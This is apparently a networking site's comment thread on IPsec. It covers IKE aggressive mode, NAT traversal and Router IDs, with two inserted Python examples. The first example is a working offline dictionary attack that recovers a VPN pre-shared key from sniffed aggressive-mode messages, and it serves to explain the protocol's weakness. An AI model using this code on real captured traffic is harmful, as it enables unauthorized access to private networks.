Glad to hear you liked it. I wouldn’t use aggressive mode; it has a security risk since the hash is sent in clear text. There are tools that retrieve the PSK when the 3 messages are captured. You almost don’t notice the speed difference…
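
The following is an added example, not code from the reply above or from the site: it reproduces the offline PSK attack the reply refers to (the technique behind tools such as ike-scan's psk-crack). In IKEv1 aggressive mode the responder's HASH_R travels unencrypted in message 2, and every other input to it (cookies, nonces, DH public values, SA payload, responder ID) is also in the three cleartext messages, so a sniffer can test PSK candidates offline. All field values below are constructed stand-ins, and SHA-1 is assumed as the negotiated hash; only the derivation of HASH_R follows RFC 2409.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Everything a passive sniffer copies out of the three cleartext aggressive-mode messages."""
    cky_i: bytes   # initiator cookie (message 1)
    cky_r: bytes   # responder cookie (message 2)
    sa_i: bytes    # body of the initiator's SA payload (SAi_b, message 1)
    gx_i: bytes    # initiator Diffie-Hellman public value (message 1)
    gx_r: bytes    # responder Diffie-Hellman public value (message 2)
    n_i: bytes     # initiator nonce (message 1)
    n_r: bytes     # responder nonce (message 2)
    id_r: bytes    # body of the responder ID payload (IDir_b, message 2)
    hash_r: bytes  # HASH_R, sent unencrypted in message 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf is HMAC over the negotiated hash; SHA-1 is assumed for this example."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, n_i: bytes, n_r: bytes) -> bytes:
    """RFC 2409 section 5.4, pre-shared key authentication: SKEYID = prf(PSK, Ni_b | Nr_b)."""
    return prf(psk, n_i + n_r)


def compute_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    The PSK is the only input that is not visible on the wire."""
    skeyid = skeyid_psk(psk, c.n_i, c.n_r)
    return prf(skeyid, c.gx_r + c.gx_i + c.cky_r + c.cky_i + c.sa_i + c.id_r)


def crack_psk(c: AggressiveModeCapture, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate PSK and compare it
    with the captured one. No packets are sent to the gateway, so nothing is logged there."""
    for candidate in wordlist:
        if hmac.compare_digest(compute_hash_r(candidate, c), c.hash_r):
            return candidate
    return None


def constructed_capture(psk: bytes) -> AggressiveModeCapture:
    """Stand-in for a sniffed exchange. All field contents are constructed for the example;
    only the way HASH_R is derived from them follows RFC 2409."""
    fields = dict(
        cky_i=bytes.fromhex("0102030405060708"),
        cky_r=bytes.fromhex("a1a2a3a4a5a6a7a8"),
        sa_i=bytes.fromhex("0000000100000001") + b"\x00" * 24,                  # constructed SA body
        gx_i=hashlib.sha256(b"constructed initiator DH public").digest() * 4,   # 128 bytes, group 2 size
        gx_r=hashlib.sha256(b"constructed responder DH public").digest() * 4,
        n_i=bytes.fromhex("11" * 20),
        n_r=bytes.fromhex("22" * 20),
        id_r=b"\x02\x00\x00\x00" + b"vpn.example.com",                           # ID_FQDN, constructed name
    )
    unsigned = AggressiveModeCapture(**fields, hash_r=b"")
    return AggressiveModeCapture(**fields, hash_r=compute_hash_r(psk, unsigned))


if __name__ == "__main__":
    capture = constructed_capture(b"cisco123")   # the gateway's real PSK; the attacker does not know it
    wordlist = [b"password", b"admin", b"cisco123", b"letmein"]
    print("recovered PSK:", crack_psk(capture, wordlist))
```

The contrast with main mode is the point: there HASH_I and HASH_R are carried in messages 5 and 6, which are already encrypted under the keys derived from the DH exchange, so a passive attacker has nothing to compare candidate PSKs against. A strong, long random PSK also defeats the dictionary attack, but it does not change the fact that aggressive mode hands the attacker the verification oracle.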

Hi. Just to confirm I am reading this correctly: for the IKE Phase I ISAKMP process, it is used to build the secure tunnel for Phase II, but in and of itself it is not securing the information/parameters/values exchanged under Phase I?

Thank you for a great explanation.
I was wondering if you can touch on NAT Traversal. I don’t quite understand what you mean (required when your IPsec peer is behind a NAT router).
Does this mean that if I’m doing a site-to-site from my firewall and my peer is a router, NAT-T will need to be enabled? Can this feature be enabled on a firewall?

@Abdool I’ll add something on NAT traversal later. Let’s say you want to establish an IPsec ESP VPN between two firewalls, one of which is behind a router that is configured for NAT. ESP doesn’t have any port numbers so your NAT device won’t be able to store any in its NAT table. NAT traversal solves this problem by encapsulating ESP traffic with a UDP header. The UDP header will then be translated with NAT.

There’s a bit more to this story but that might be nice for a future lesson
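
As an added example (not part of the reply above and not the site's own code), the Python below builds the two packet shapes the reply contrasts and pushes both through a toy port-translating NAT. The NAT model deliberately does only what the reply describes: it keys its table on a source port, so a raw ESP datagram (IP protocol 50) gives it nothing to store, while the same ESP bytes wrapped in a UDP header per RFC 3948 get a normal translation. It also shows how a NAT-T peer demultiplexes UDP/4500, where IKE is prefixed with a 4-byte zero "non-ESP marker" and a single 0xFF byte is a NAT keepalive. Addresses, SPI and ciphertext are constructed.

```python
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPPROTO_ESP = 50
NAT_T_PORT = 4500
NON_ESP_MARKER = b"\x00\x00\x00\x00"   # prefixes IKE carried on UDP/4500 (RFC 3948 section 2.2)
NAT_KEEPALIVE = b"\xff"                # one-octet NAT-keepalive payload (RFC 3948 section 2.3)


@dataclass
class Datagram:
    """Minimal IP datagram model: addresses, IP protocol number and the bytes after the IP header."""
    src_ip: str
    dst_ip: str
    proto: int
    payload: bytes


def build_esp(spi: int, seq: int, ciphertext: bytes) -> bytes:
    """ESP header is SPI (4 bytes) | Sequence Number (4 bytes), then the encrypted payload.
    Nothing in it resembles a port number."""
    return struct.pack("!II", spi, seq) + ciphertext


def udp_encapsulate_esp(esp: bytes, sport: int = NAT_T_PORT, dport: int = NAT_T_PORT) -> bytes:
    """RFC 3948 section 2.1: an 8-byte UDP header directly in front of the ESP header.
    The UDP checksum is sent as zero, which RFC 3948 permits for IPv4."""
    return struct.pack("!HHHH", sport, dport, 8 + len(esp), 0) + esp


def parse_udp_header(payload: bytes) -> Tuple[int, int, int, int]:
    """Return (source port, destination port, length, checksum) of a UDP header."""
    return struct.unpack("!HHHH", payload[:8])


def classify_port_4500_payload(udp_payload: bytes) -> str:
    """Demultiplex UDP/4500 the way a NAT-T capable peer does. SPI values 0..255 are reserved,
    so real ESP never starts with four zero bytes; IKE on 4500 is prefixed with exactly that."""
    if udp_payload == NAT_KEEPALIVE:
        return "NAT-keepalive"
    if udp_payload[:4] == NON_ESP_MARKER:
        return "IKE"
    return "ESP"


class Napt:
    """Toy port-translating NAT. It can only create a table entry for protocols whose
    L4 header begins with a 16-bit source port (TCP, UDP), as the reply above describes."""

    def __init__(self, public_ip: str, first_port: int = 20000) -> None:
        self.public_ip = public_ip
        self.next_port = first_port
        self.table: Dict[Tuple[str, int, int], int] = {}  # (inside ip, inside port, proto) -> outside port

    def translate_outbound(self, d: Datagram) -> Optional[Datagram]:
        if d.proto not in (IPPROTO_TCP, IPPROTO_UDP):
            return None  # e.g. raw ESP (protocol 50): no port to key on, so no entry and no forwarding
        sport, dport = struct.unpack("!HH", d.payload[:4])
        key = (d.src_ip, sport, d.proto)
        if key not in self.table:
            self.table[key] = self.next_port
            self.next_port += 1
        rewritten = struct.pack("!HH", self.table[key], dport) + d.payload[4:]
        return Datagram(self.public_ip, d.dst_ip, d.proto, rewritten)


def demo() -> Tuple[Optional[Datagram], Optional[Datagram]]:
    """Push the same ESP packet through the NAT twice: raw, then UDP-encapsulated.
    Addresses, SPI and ciphertext are constructed."""
    nat = Napt(public_ip="203.0.113.1")
    esp = build_esp(spi=0x1000ABCD, seq=1, ciphertext=b"\x00" * 32)
    raw = Datagram("10.0.0.2", "198.51.100.9", IPPROTO_ESP, esp)
    nat_t = Datagram("10.0.0.2", "198.51.100.9", IPPROTO_UDP, udp_encapsulate_esp(esp))
    return nat.translate_outbound(raw), nat.translate_outbound(nat_t)


if __name__ == "__main__":
    raw_out, natt_out = demo()
    print("raw ESP through NAPT:", raw_out)                       # None: nothing to translate
    print("NAT-T ESP through NAPT:", natt_out.src_ip, parse_udp_header(natt_out.payload))
```

Two practical notes. Some NAT devices offer "IPsec passthrough", which tracks ESP SPIs to fake a mapping for a single inside peer; the toy above leaves that out on purpose, since the reply is about why plain NAT cannot translate ESP. And because the outer UDP checksum is zero and the NAT rewrites the UDP ports, the encrypted ESP payload and its integrity check are untouched, which is the whole reason NAT-T works where AH (which covers the IP header) would not.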

I’m not quite sure what you mean by identities on Cisco devices. Are you referring to the Router ID when configuring routing protocols? If so, it is a good idea to change the Router ID for the following reasons:

If a Router ID is not explicitly configured, the router will choose the highest active IPv4 address of an interface on the device. If for whatever reason this interface goes down, the Router ID will change and thus the routing protocol will be disrupted, possibly requiring reconvergence. Explicitly configured Router IDs do not change and are not affected by the status of interfaces.

Secondly, if you are using IPv6, and there are no active interfaces with IPv4 addresses assigned, dynamic routing protocols will not function until you have explicitly configured a Router ID. Remember, router IDs are in the format of IPv4 addresses.

Finally, another option is to configure a Loopback interface with a specific IPv4 address. If it is the highest address, it will be used as the Router ID. And since loopback interfaces cannot go down unless they are manually shut down, you will not have a problem with interfaces going down and Router IDs changing.